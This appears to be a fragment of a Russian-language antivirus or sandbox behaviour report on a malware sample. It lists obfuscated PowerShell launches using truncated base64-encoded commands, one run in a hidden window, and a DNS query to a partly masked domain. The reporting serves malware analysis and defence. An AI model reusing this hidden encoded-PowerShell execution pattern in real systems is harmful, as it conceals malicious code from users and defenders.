Техническая информация
- '<SYSTEM32>\cmd.exe' & /c POwerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAVgA3AGsAawBhAGwAdgBoAF8AcwB6ADMAbQBVAGsAXwAyAEUAagBXAHkAIAAoACAAJABZAHYAWABBAHkAYwBJAF8AZwBfAG0AaQBCAFcAOQBnAHgARgBVAFcAdwA5AEMATQA4ADcAVABQAHMAIAAsA...
- DNS ASK u.##wd.se
- '<SYSTEM32>\cmd.exe' & /c POwerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAVgA3AGsAawBhAGwAdgBoAF8AcwB6ADMAbQBVAGsAXwAyAEUAagBXAHkAIAAoACAAJABZAHYAWABBAHkAYwBJAF8AZwBfAG0AaQBCAFcAOQBnAHgARgBVAFcAdwA5AEMATQA4ADcAVABQAHMAIAAsA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -En ZgB1AG4AYwB0AGkAbwBuACAAVgA3AGsAawBhAGwAdgBoAF8AcwB6ADMAbQBVAGsAXwAyAEUAagBXAHkAIAAoACAAJABZAHYAWABBAHkAYwBJAF8AZwBfAG0AaQBCAFcAOQBnAHgARgBVAFcAdwA5AEMATQA4ADcAVABQAHMAIAAsACAAJAB4AFkAdQB3A...